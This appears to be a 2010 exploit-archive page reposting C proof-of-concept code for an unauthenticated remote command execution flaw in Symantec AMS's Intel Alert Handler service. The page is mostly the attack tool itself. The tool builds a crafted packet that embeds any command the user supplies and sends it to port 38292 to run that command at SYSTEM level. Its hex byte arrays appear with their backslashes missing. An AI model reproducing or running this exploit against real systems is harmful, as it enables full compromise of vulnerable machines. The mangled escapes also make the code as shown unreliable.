Symantec AMS Intel Alert Handler Service Design Flaw
Posted on 28 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Symantec AMS Intel Alert Handler Service Design Flaw</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== Symantec AMS Intel Alert Handler Service Design Flaw ==================================================== // Remote command execution at System level without authentication // Advisory:https://www.foofus.net/?page_id=149 // Exploit Title: Symantec AMS Intel Alert Handler service Design Flaw // Date: 07/28/10 // Author: Spider // Software Link: http://www.foofus.net/~spider/code/ams-cmd.cpp.txt // Tested on: Symantec SAVCE 10.1.8 and earlier with AMS installed // POC code to execute commands on system vulnerable to AMS2 // design flaw of Intel Alert Handler service (hndlrsvc.exe) // within Symantec SAVCE 10.1.8 and earlier // ***Created by Spider July 2009*** //--------------------Foofus.net------------------------- #include <stdio.h> #include <dos.h> #include <string.h> #include <winsock.h> #include <windows.h> unsigned char payload[1000]; unsigned char inject1[] = "xffxffxffxffxffxffxffxffx00x00" "x02x00x95x94xc0xa8x02x64x00x00x00x00x00x00x00x00" "xe8x03x00x00x50x52x47x58x43x4ex46x47x10x00x00x00" "x00x00x00x00x04x41x4cx48x44x5cx46x00x00x01x00x00" "x00x01x00x0ex00x52x69x73x6bx20x52x65x70x61x69x72" "x65x64x00x25x00x53x79x6dx61x6ex74x65x63x20x41x6e" "x74x69x56x69x72x75x73x20x43x6fx72x70x6fx72x61x74" "x65x20x45x64x69x74x69x6fx6ex00xf9x1dx13x4ax3fx0c" "x00x4cx41x42x53x59x53x54x45x4dx2dx31x00x08x08x0a" "x00x52x69x73x6bx20x4ex61x6dx65x00x07x00x05x00x54" "x65x73x74x00x08x0ax00x46x69x6cx65x20x50x61x74x68" "x00x07x00x05x00x54x65x73x74x00x08x11x00x52x65x71" "x75x65x73x74x65x64x20x41x63x74x69x6fx6ex00x07x00" "x05x00x54x65x73x74x00x08x0ex00x41x63x74x75x61x6c" "x20x41x63x74x69x6fx6ex00x07x00x05x00x54x65x73x74" "x00x08x07x00x4cx6fx67x67x65x72x00x07x00x05x00x54" "x65x73x74x00x08x05x00x55x73x65x72x00x07x00x05x00" "x54x65x73x74x00x08x09x00x48x6fx73x74x6ex61x6dx65" "x00x0ex00x0cx00x4cx41x42x53x59x53x54x45x4dx2dx31" "x00x08x13x00x43x6fx72x72x65x63x74x69x76x65x20x41" "x63x74x69x6fx6ex73x00x07x00x05x00x54x65x73x74x00" "x00x07x08x12x00x43x6fx6ex66x69x67x75x72x61x74x69" "x6fx6ex4ex61x6dx65x00x22x00x20"; unsigned char cmdother[] = "x00x08x0cx00x43x6fx6dx6dx61x6ex64x4cx69x6ex65"; unsigned char inject2[] = "x00x08x08x00x52x75x6ex41x72x67x73x00x04x00x02x00" "x20x00x03x05x00x4dx6fx64x65x00x04x00x02x00x00x00" "x0ax0dx00x46x6fx72x6dx61x74x53x74x72x69x6ex67x00" "x02x00x00x00x08x12x00x43x6fx6ex66x69x67x75x72x61" "x74x69x6fx6ex4ex61x6dx65x00x02x00x00x00x08x0cx00" "x48x61x6ex64x6cx65x72x48x6fx73x74x00x0bx00x09x00" "x44x45x41x44x42x45x45x46x00x00x00x00x00"; void banner (char *proga) { system("cls"); printf(" Use: %s <ip> <command> ", proga); } int main ( int argc, char *argv[] ) { SOCKET sock; WSADATA wsa; struct sockaddr_in addr; printf(" __ ___ __ __ __ "); printf(" | / \ | / _/___ |__| _\ |___ _ __ | / \ | "); printf("\_\\ //_/ \_ \ . \| |/ . / ._\| `_/ \_\\ //_/ "); printf(" .'/()\'. /___/ _/|__|\___\___\|_| .'/()\'. "); printf(" \ \ / / |_\ \ \ / / "); printf(" AMS Remote Command Tool "); int port; if ( argc < 3 ) { banner(argv[0]); exit(0); } char *ip_addr = argv[1]; int length = (int)strlen(argv[2]); if (length > 128) { printf(" WARNING WARNING WARNING %s "); printf(" Input Command String Greater than 128 Characters is not Permited %s "); exit (0); } // building injection packet inject1[353] = length+3; inject1[355] = length+1; memcpy(payload,inject1,356); int a = 356; for (int i = 0; i<(length); i++) { a=a+1;payload[a] = argv[2][i]; } int b = a; for (int i = 0; i<=14; i++) { b=b+1;payload[b] = cmdother[i]; } int c = b; payload[c+2] = length+3; payload[c+4] = length+1; int d = c+5; for (int i = 0; i<length; i++) { d=d+1;payload[d] = argv[2][i]; } int e = d; for (int i = 0; i<=109; i++) { e=e+1;payload[e] = inject2[i]; } // setting up socket and sending packet printf("[] preparing.... "); WSAStartup(MAKEWORD(2,0), &wsa); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); addr.sin_family = AF_INET; addr.sin_port = htons(38292); addr.sin_addr.s_addr = inet_addr(ip_addr); printf("[] connecting.. "); if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1 ) { printf("[-] connection failed! "); exit(0); } printf("[] sending crafted packet 1 ... "); if ( send(sock, payload, sizeof(payload), 0) == -1 ) { printf("[-] send failed! "); exit(0); } closesocket(sock); WSACleanup(); return 0; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-28]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
